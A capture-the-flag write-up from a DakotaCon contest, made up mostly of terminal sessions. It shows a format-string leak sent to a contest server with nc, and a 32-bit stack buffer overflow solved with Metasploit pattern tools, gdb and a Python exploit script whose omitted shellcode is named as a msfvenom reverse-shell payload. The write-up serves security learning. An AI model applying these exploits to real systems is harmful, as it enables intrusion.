Local CTF team over at SecDSM tied for 2nd place on this one. Thanks to the great folks over at DakotaCon for setting this up.

Below are some raw outputs of how we accomplished each task. It's not a very detailed write-up yet, but it may be edited in the future, especially once I get to the RE challenges.

Exploit 100

This one was a simple format string exploit: the binary opened a flag file and saved its contents in a stack buffer, then passed our input straight to printf as the format string. Because of this, a long run of "%08x" walks up the stack word by word and dumps the flag back to us.

[email protected]:~/DakotaCon/Exploit100# python -c'print "%08x" * 400' | nc 138.247.115.12 3268
Enter your message: 00000064f76fd5a0fff5a248f7732a7400000001f77012e809e97008757065526c6261746d6552657948786974617264000a6465000000c2f75dc76bfff5a23efff5a33c78383025783830257838302578383025783830257838302578383025
[email protected]:~/DakotaCon/Exploit100#
[email protected]:~/DakotaCon/Exploit100# 
[email protected]:~/DakotaCon/Exploit100# echo "00000064f77875a0ff8af148f77bca7400000001f778b2e809fde008757065526c6261746d6552657948786974617264000a6465000000c2f766676bff8af13eff8af23c78383025783830257838302578383025783830257838302578383025" | fold -w8 > strings.txt && for i in $(tac strings.txt); do echo $i | xxd -r -p; done
x80%x80%x80%x80%x80%x80%x80%???<???>?fgk?
detardyHximeRelbatupeR	??x???{?t???H?
[email protected]:~/DakotaCon/Exploit100# echo detardyHximeRelbatupeR | rev
ReputableRemixHydrated

Exploit 250

This binary prints two addresses (a code address and the stack address of the input buffer) before reading a message. A 100-byte message crashes it, so a cyclic pattern is used to find the offset into EIP, and the printed buffer address is reused as the return target.

[email protected]:~/DakotaCon/Exploit250# ./exploit250 
0x80484cb
Enter your message: string
0xbfb398b0
string

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 100' | ./exploit250 
0x80484cb
Enter your message: 0xbf84f8b0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100 > input.txt
[email protected]:~/DakotaCon/Exploit250# 

[email protected]:~/DakotaCon/Exploit250# gdb -q ./exploit250
Reading symbols from ./exploit250...(no debugging symbols found)...done.

gdb-peda$ r < input.txt
Starting program: /root/DakotaCon/Exploit250/exploit250 < input.txt
0x80484cb
Enter your message: 0xbffff550
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

...SNIP...
EIP: 0x63413563 ('c5Ac')
...SNIP...
Stopped reason: SIGSEGV
0x63413563 in ?? ()
gdb-peda$ 

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 100 -q 0x63413563
[*] Exact match at offset 76
[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde"' > input.txt
[email protected]:~/DakotaCon/Exploit250# 

...SNIP...
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()
...SNIP...

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, <incomplete sequence \336>

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde" + "C" * 400' > input.txt

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, "οΎ­\336", 'C' <repeats 120 times>...

Exploit script (the msfvenom reverse shell payload is left out):

from struct import pack

# Python 2, same as the one-liners above: str is a byte string and
# print writes it straight to stdout.

payload = "\xeb\x08"    # Short jump: jmp +8, skips over the saved return address into the second NOP sled

ret = pack("<L", 0xbffff550)    # Stack address of the input buffer in gdb, i.e. the start of our NOP sled
offset = 76                     # Bytes until the saved return address (from pattern_offset above)

sploit = "\x90" * (offset - len(payload))    # 74 NOPs
sploit += payload
sploit += ret

shellcode = ""    # msfvenom generated payload with linux/x86/shell_reverse_tcp (not included here)
payload = "\x90" * 20
payload += shellcode

# [74 NOP][Short Jump][Return][20 NOP][PAYLOAD]
sploit += payload

print sploit